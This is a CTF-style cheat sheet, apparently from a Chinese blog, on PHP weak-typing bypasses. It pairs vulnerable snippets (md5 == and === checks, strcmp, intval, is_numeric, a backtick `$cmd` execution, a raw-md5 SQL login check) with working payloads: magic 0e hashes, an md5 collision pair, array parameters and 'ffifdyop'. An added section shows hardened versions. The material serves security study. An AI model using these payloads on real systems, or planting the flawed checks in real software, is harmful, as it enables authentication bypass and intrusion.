== loose comparison
<?php
if (isset($_POST['a']) and isset($_POST['b'])) {
    if ($_POST['a'] != $_POST['b']) {
        if (md5($_POST['a']) == md5($_POST['b']))
            echo 'flag';
        else
            echo 'you are wrong';
    }
    else
        echo "请输入不同的a,b值";
}
payload1 - pass arrays
a[]=111&b[]=222
payload2 - pass two strings whose md5 digests both start with 0e (the rest of each digest must be digits only, so PHP reads both digests as the number 0)
a=s878926199a&b=s155964671a
=== strict comparison
Besides the values, the types on both sides must also be equal:
$a = 1;
$a === "1"; // false
$a == "1";  // true
<?php
if (isset($_POST['a']) and isset($_POST['b'])) {
    if ($_POST['a'] != $_POST['b']) {
        if (md5($_POST['a']) === md5($_POST['b']))
            echo 'flag';
        else
            echo 'you are wrong';
    }
    else
        echo "请输入不同的a,b值";
}
if ((string)$_POST['a'] !== (string)$_POST['b'] && md5($_POST['a']) === md5($_POST['b'])) {
    echo `$cmd`;
} else {
    echo ("nonono");
} // this variant only works with payload2
payload1 - pass arrays
a[]=111&b[]=222
payload2 - use an md5 collision: send two different strings that have the same md5 digest (send them via Burp; HackBar's automatic encoding breaks them)
// the strings contain non-printable bytes, so they are shown urlencoded
1%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%A3njn%FD%1A%CB%3A%29Wr%02En%CE%89%9A%E3%8EF%F1%BE%E9%EE3%0E%82%2A%95%23%0D%FA%CE%1C%F2%C4P%C2%B7s%0F%C8t%F28%FAU%AD%2C%EB%1D%D8%D2%00%8C%3B%FCN%C9b4%DB%AC%17%A8%BF%3Fh%84i%F4%1E%B5Q%7B%FC%B9RuJ%60%B4%0D7%F9%F9%00%1E%C1%1B%16%C9M%2A%7D%B2%BBoW%02%7D%8F%7F%C0qT%D0%CF%3A%9DFH%F1%25%AC%DF%FA%C4G%27uW%CFNB%E7%EF%B0
1%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%A3njn%FD%1A%CB%3A%29Wr%02En%CE%89%9A%E3%8E%C6%F1%BE%E9%EE3%0E%82%2A%95%23%0D%FA%CE%1C%F2%C4P%C2%B7s%0F%C8t%F28zV%AD%2C%EB%1D%D8%D2%00%8C%3B%FCN%C9%E24%DB%AC%17%A8%BF%3Fh%84i%F4%1E%B5Q%7B%FC%B9RuJ%60%B4%0D%B7%F9%F9%00%1E%C1%1B%16%C9M%2A%7D%B2%BBoW%02%7D%8F%7F%C0qT%D0%CF%3A%1DFH%F1%25%AC%DF%FA%C4G%27uW%CF%CEB%E7%EF%B0
a=%4d%c9%68%ff%0e%e3%5c%20%95%72%d4%77%7b%72%15%87%d3%6f%a7%b2%1b%dc%56%b7%4a%3d%c0%78%3e%7b%95%18%af%bf%a2%00%a8%28%4b%f3%6e%8e%4b%55%b3%5f%42%75%93%d8%49%67%6d%a0%d1%55%5d%83%60%fb%5f%07%fe%a2&b=%4d%c9%68%ff%0e%e3%5c%20%95%72%d4%77%7b%72%15%87%d3%6f%a7%b2%1b%dc%56%b7%4a%3d%c0%78%3e%7b%95%18%af%bf%a2%02%a8%28%4b%f3%6e%8e%4b%55%b3%5f%42%75%93%d8%49%67%6d%a0%d1%d5%5d%83%60%fb%5f%07%fe%a2
$c == md5($c)
payload - the comparison itself is loose
c=0e215962017
// the md5 of 0e215962017 is 0e291242476940776845150308577824, so both sides are 0e-strings that compare as 0
strcmp
strcmp($a,$b) compares two strings and returns 0 when they are equal; it also returns 0 when it errors, so pass an array to make it error
if(!strcmp($a, $flag)){
    echo $flag;
}
payload
a[]=1
Suppose the SQL query is select * from 'admin' where password=md5($pass,true)
md5($pass, true) returns the raw digest bytes, and MySQL reads them as a string; so if some string's md5 begins with 'or' followed by a digit, the condition becomes password=''or'<digit>...' and the check is bypassed
The md5 of ffifdyop in raw form is: 'or'6É]é!r,ùíb
Array overflow
if($array[++$c]=1){
    if($array[]=1){
        echo "nonono";
    }
    echo "success";
}
// Both conditions are assignments: the assignment to index $c+1 must succeed and the one to index $c+2 must fail
// Use integer overflow so that $c+2 overflows: PHP_INT_MAX is 2147483647 on 32-bit and 9223372036854775807 on 64-bit
// So set $c=9223372036854775806 (64-bit example)
intval bypass (scientific notation)
if (isset($_GET['num'])){
    $num = $_GET['num'];
    if(intval($num) < 2020 && intval($num + 1) > 2021){
        echo "success.</br>";
    }else{
        die("no");
    }
}else{
    die("no");
}
// Use scientific notation: intval('1e4') is 1 while intval('1e4'+1) is 10001 (this holds for PHP before 7.1; since 7.1 intval('1e4') returns 10000)
// So set $num=1e4 (or '1e4')
Loosely typed integer comparison bypass
$temp = $_GET['password'];
is_numeric($temp)?die("no numeric"):NULL;
if($temp>1336){
    echo $flag;
}
// Bypass with a non-numeric, loosely typed value: password=1337a
// Or pass an array: password[]=1
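As an added example (not code from the original post), the loose md5() check from the "==" section and the intval()/is_numeric() checks above are placed beside hardened versions and run on constructed inputs; the function names are my own.

```php
<?php
// Added example, not code from the original post. It puts the loose md5()
// comparison from the "==" section and the intval()/is_numeric() checks
// beside hardened versions and runs both on constructed inputs.

// The pattern from the notes. On PHP 7 md5() of an array returns NULL with a
// warning, so NULL == NULL also passes; on PHP 8 it throws a TypeError.
function weak_md5_equal($a, $b): bool
{
    return $a != $b && md5($a) == md5($b);
}

// Hardened: accept only strings (stops a[]=...), compare the raw values
// strictly, compare digests with hash_equals() (byte-wise, never numeric,
// constant-time) and use SHA-256 so the md5 collision pair no longer applies.
function strict_digest_equal($a, $b): bool
{
    if (!is_string($a) || !is_string($b) || $a === $b) {
        return false;
    }
    return hash_equals(hash('sha256', $a), hash('sha256', $b));
}

// Hardened integer input: ctype_digit() accepts only strings made of 0-9,
// so "1e4", "1337a" and arrays are rejected where intval()/is_numeric() bend.
function strict_int($v): ?int
{
    return (is_string($v) && ctype_digit($v)) ? (int) $v : null;
}

// Constructed inputs; the first two pairs use 0e strings listed on this page.
$pairs = [
    ['s878926199a', 's155964671a'], // md5 digests 0e545... and 0e342...
    ['QNKCDZO', 's878926199a'],     // md5 digests 0e830... and 0e545...
    ['abc', 'abd'],                 // ordinary strings
];
foreach ($pairs as [$a, $b]) {
    printf("%-12s %-12s weak=%-5s hardened=%s\n", $a, $b,
        var_export(weak_md5_equal($a, $b), true),
        var_export(strict_digest_equal($a, $b), true));
}

var_dump(strict_int('1e4'), strict_int('1337a'), strict_int(['1']), strict_int('1337'));
```

The two 0e pairs pass weak_md5_equal() and fail strict_digest_equal(), and strict_int() returns NULL for everything except '1337'.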
Underscore filter bypass + preg_match bypass
$query = $_SERVER['QUERY_STRING'];
if( substr_count($query, '_') !== 0 || substr_count($query, '%5f') != 0 ){
    die('Y0u are So cutE!');
}
if($_GET['b_u_p_t'] !== '23333' && preg_match('/^23333$/', $_GET['b_u_p_t'])){
    echo "you are going to the next ~";
}
// First point: the b_u_p_t parameter must be sent, but the query string may not contain _
// A space ( ), plus sign (+), dot (.), or their URL encodings can be used instead, since PHP converts them to _ in parameter names
// Second point: the value must not be 23333 but must still match the anchored regex
// Use a newline %0a: $ also matches just before a trailing newline
// payload: b+u+p+t=23333%0a
Additional note:
http://localhost/aaa/index.php?p=222&q=333
$_SERVER['QUERY_STRING'] = "p=222&q=333";
$_SERVER['REQUEST_URI']= "/aaa/index.php?p=222&q=333";
$_SERVER['SCRIPT_NAME']= "/aaa/index.php";
$_SERVER['PHP_SELF']= "/aaa/index.php";
Summary of MD5 values starting with 0e
sosei3f: 0ea0851992f2e29b
QNKCDZO: 0e830400451993494058024219903391
s878926199a: 0e545993274517709034328855841020
s155964671a: 0e342768416822451524974117254469
From: https://www.cnblogs.com/s1mh0/p/17052942.html